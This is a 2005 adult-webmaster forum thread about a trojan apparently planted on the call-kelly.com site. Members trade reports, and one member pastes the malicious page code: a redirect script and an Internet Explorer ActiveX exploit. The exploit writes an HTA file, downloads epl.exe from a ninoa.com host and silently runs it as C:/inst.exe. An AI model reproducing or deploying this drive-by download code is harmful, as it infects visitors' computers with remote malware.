GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Call Kelly has a trojan??? (https://gfy.com/showthread.php?t=529915)

Titan 10-19-2005 12:44 PM
Call Kelly has a trojan???
 
I was visiting this site today and i got a nasty trojan warning:

http://www.call-kelly.com/index.php
WARNING DONT CLICK UNLESS YOUR COMPUTER HAS A CONDOM ON!

These guys have been around for a few years so i dunno whats up. Maybe they got hacked or something.

beta-tester 10-19-2005 12:49 PM
I don't know about you, but here works without any problems...

reynold 10-20-2005 02:02 AM
Sorry, I don't use condom.

xclusive 10-20-2005 02:03 AM
didn't come up with me try doing a virus scan on your computer might be from somewhere else

darksoul 10-20-2005 02:07 AM
looks clean

SmutGiant 10-20-2005 02:10 AM
It messed up my computer a couple of weeks ago... clicking on that link from this thread just caused my Microsoft AntiSpyware to go off.

SmokeyTheBear 10-20-2005 02:17 AM
yup trojan going to

http://89677.www2.ninoa.com/1_.php?cust=28

<head>
<xml:namespace prefix="RS"><style type="text/css">@media all {RS\:clientcaps {behavior:url(#default#clientcaps)}}</style></xml:namespace><RS:clientcaps id="caps" />
</head>
<body>
<script>

function generic() {

}

onerror=generic;


if ( (typeof(caps.connectionType)hahahaha'undefined') ||
(caps.connectionType!='lan'))
{

document.location="http://89677.www2.ninoa.com/1_.php?cust=28";

}

</script>

</body>

V_RocKs 10-20-2005 02:21 AM
Sorry, but:

FUCKING RUSSIANS!

SmokeyTheBear 10-20-2005 02:39 AM
document.write("<object id=mini classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=Minimize></object><script>mini.Click()</script>");

try {
var rs = new ActiveXObject("ADODB.Recordset");
rs.fields.append("conn", 200, "3000");
rs.open();
rs.AddNew();

rs.Fields("conn").Value = '><script>window.moveTo(10000,10000)</script><HTA:APPLICATION SHOWINTASKBAR="no"><script language="vbscript">: on error resume next : set o = CreateObject("ms"&"xml2.XM"& "LHTTP") : o.open "GET","http://'+prefix+'.www2.nin"&"oa.com/files/epl.exe",False : o.send : set s = createobject("adodb.stream") : s.type=1 : s.open : s.write o.responseBody : execute "s.sa"&"vetofile ""C:/inst.exe"",2": Set os = CreateObject("Shell.Application") : os.ShellExecute "C:/inst.exe", "-d -s -c'+cust+' -installsp2" : window.close()</script>';

rs.Update();
rs.Save("C:/inst.hta", 0);
rs.Close();
} catch(ex){}

document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',C:/inst.hta,'></object><script>a.Click()</script>");

function cl(){
focus();
document.write("<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>c.Click()</script>");
}

setTimeout("cl()",500);

tomud 10-20-2005 03:53 AM
:(

Tomud

SGS 10-20-2005 04:19 AM
Isnt this the second time Call Kelly has been hit?

Dalai lama 10-20-2005 04:20 AM
I'm not clicking the link :2 cents:

Ace_luffy 10-20-2005 04:30 AM
owww it's not good then

LasseKongos 10-20-2005 01:15 PM
Cant see anything... What is the program your using to dettect that??

SmokeyTheBear 10-20-2005 01:21 PM
Quote:
Originally Posted by LasseKongos
Cant see anything... What is the program your using to dettect that??
its gone now

Screaming 10-20-2005 01:22 PM
that fucking sucks


All times are GMT -7. The time now is 05:18 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123